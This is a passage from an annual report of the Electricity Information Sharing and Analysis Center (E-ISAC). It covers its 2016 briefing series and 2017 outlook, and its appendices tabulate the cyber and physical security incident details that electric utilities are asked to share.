
Participation in the monthly briefings during 2016 ranged from 180 to over 400 attendees. This year was the first full year that the series included a physical security section (added April 2015) and full replays were available for member download (added December 2015). Based on polling feedback, 70 to 96 percent of attendees consider the meetings to be of “Considerable Value” or “Great Value.” The E-ISAC will continue to encourage industry to share security best practices and lessons learned on topics relevant to the sector by inviting more industry AOOs as guest presenters. Sets of early-release webinar information are typically provided the day following the webinar.

Monthly Briefing Series: A Look at 2017 In an effort to share more specific and relevant information on our monthly briefing call, the E-ISAC has invited AOO members to submit their ideas on critical infrastructure protection topics. This change in the 2017 monthly briefing series is to better serve the E-ISAC members’ needs.


Chapter 6: Conclusion

2017 Outlook Increased physical security and cyber security information sharing will enable more complete analysis by the E-ISAC. Robust data over time helps identify important trends and patterns. In 2017, the E-ISAC will continue to review and apply recommendations from the ESCC and NERC’s CIPC. The E-ISAC plans to continue adding capabilities and new products and encourage active involvement from members of the electricity industry. The E-ISAC’s aim is to add value for its members and assist with overall risk reduction across the Electric Reliability Organization Enterprise by providing timely information and analysis. The E-ISAC encourages participation at all levels but especially from electric utility operations, safety, security, and reliability teams. Additional information on what and how to share with the E-ISAC can be found in Appendix A of this report. Members are urged to fill out the survey below. Feedback on ways to improve this report is welcomed, including the types of data, its analysis, and any other information that would be of value to members.

The Electricity Information Sharing and Analysis Center (E-ISAC) Operated by NERC in Washington, D.C., the E-ISAC establishes situational awareness, incident management, coordination, and communication capabilities across the electric industry through timely, reliable, and secure information exchange. The E-ISAC, in collaboration with the Department of Energy and the Electricity Subsector Coordinating Council, serves as the primary security communications channel for the electric industry and enhances industry’s ability to prepare for and respond to cyber and physical threats, vulnerabilities, and incidents. E-ISAC Contact 24x7 Phone: 1-404-446-9780 E-mail: [email protected] For E-ISAC information: https://www.eisac.com/ What is this? This is an annual report. It is designed to improve sector physical and cyber security awareness by summarizing activities observed and shared with the E-ISAC. The content highlights both public and private reports the E-ISAC is tracking. Compliance Officers in receipt of this report are encouraged to share it with their security and operations team.

This report is accessible via the E-ISAC private portal at https://www.eisac.com/


https://www.esisac.com/


Appendix I

Table I.1 Cyber Information to Share

Types of information/activities to share

Information on cyber events have been classified as incidents by your organization.

Cyber incident-specific details on the type of impact observed: Data specific impacts including, data destruction, data theft, or data

manipulation/encryption. Operational technology impacts, loss of operator situational awareness,

impacts to operator process visibility, or manipulation of process control.

Threats received of intended cyber malicious activities (publicly or privately) to either employees or the company.

Other public events, such as website defacements, DDoS activity, etc.

Actionable information

This largely encompasses IOCs from observed events. IOCs are the observable artifacts left by either an attempted (successful or unsuccessful) attack or intrusion. The E-ISAC can also assist in determining IOCs if a member can only provide forensic artifacts, such as network traffic or binary files.

Details to provide about the event

Malicious or suspicious email messages. Include the full email details to assist other utilities in searching for variations based on sender addresses, subject lines, email texts, Internet links, attachment names, attachment unique identifiers, and attachment files for analysis of file behavior.

Network traffic summarization, including the suspicious source IP address and the source or destination communication ports. This information will allow other entities to see if they are receiving potentially malicious communications from the same IP address or over the same communication ports.

Malicious website activity targeting company websites or websites used by industry asset owners and operators.

Malicious files or activity associated with removable media. Include samples of the malicious files or unique signatures of the malicious files that other entities can search within their environment.

Other suspicious activity related to electric systems operations technology.

Where to find information to share

Suspicious email messages and attachments.

Detected malicious files.

Network captures from targeted environments.

Memory images of impacted devices.

Disk images from impacted devices.

System log files.

Application log files.

Appendix I


Table I.2 Physical Information to Share

Types of information/activities to share

Expressed or implied threat: Receipt of verbal or written threat to commit a crime that will result in death or bodily injury to another person(s), or to damage or compromise a facility/infrastructure or secured protected site.

Break-ins/attempted break-ins: Unauthorized personnel attempting to enter or actually entering a restricted area, or secured protected site.

Sabotage, tampering, or vandalism: Discovery of damage, defacement, or destruction of an electrical facility/infrastructure or secured protected site.

Theft, loss, or diversion: Indications of individuals stealing or diverting something associated with a facility/infrastructure or secured protected site.

Social Engineering attempts: Discovery of an individual presenting false information or misusing insignia, documents, identification, etc., to misrepresent affiliation as a means of concealing possible illegal activity. Individuals soliciting information at a level beyond mere curiosity about a public or private event; particular facets of a facility or building, and its purpose, operations, security procedures.

Observation, surveillance: Unknown drones flying or hovering over power plants, substations, or transmission lines. Individuals demonstrating unusual or prolonged interest in facilities, buildings, or infrastructure beyond mere casual (e.g., tourists) or professional (e.g., engineers) interest.

Actionable information This largely encompasses the details of observed behavior or physical

evidence available at a location where the physical event occurred.

Details to provide about the event

Details of physical event, including time discovered, estimated time of occurrence, if suspects are in custody, risk assessment to personnel and facilities.

Physical description of suspects and photos.

Vehicle description, license plates, and photos.

Description of suspect communication, accent, tone, background noise, phone number, and time contacted.

Suspicious behavior description: Observation through binoculars, taking notes, attempting to mark off or measure distances, photography, or video of facility.

Suspicious item details: Photos of suspicious package, details of potential explosive device, where discovered, likely time of placement, typical access to the location, and description of how it was discovered.

Where to find information to share

Human observation: Onsite security staff and witness reports.

Monitoring systems: Camera and video recording, physical security system alerts, cable tray detection systems, and motion detection alerts onsite security staff, and witness reports.

Logs: Phone system, door/facility gate events, visitor sign in, security staff reports, and shift turn over records.

Please indicate the degree of usefulness of this E-ISAC Product, Service or Tool.

Extremely

Useful

Very Useful Neutral Somewhat

Useful

Not Useful

How useful was this

document or report?

Any specific feedback you would like to provide?

To submit this survey, you will click "Save as" and email the document to the E-ISAC staff member

Beth Gannett, Manager of Engagement & Member Services. [email protected]
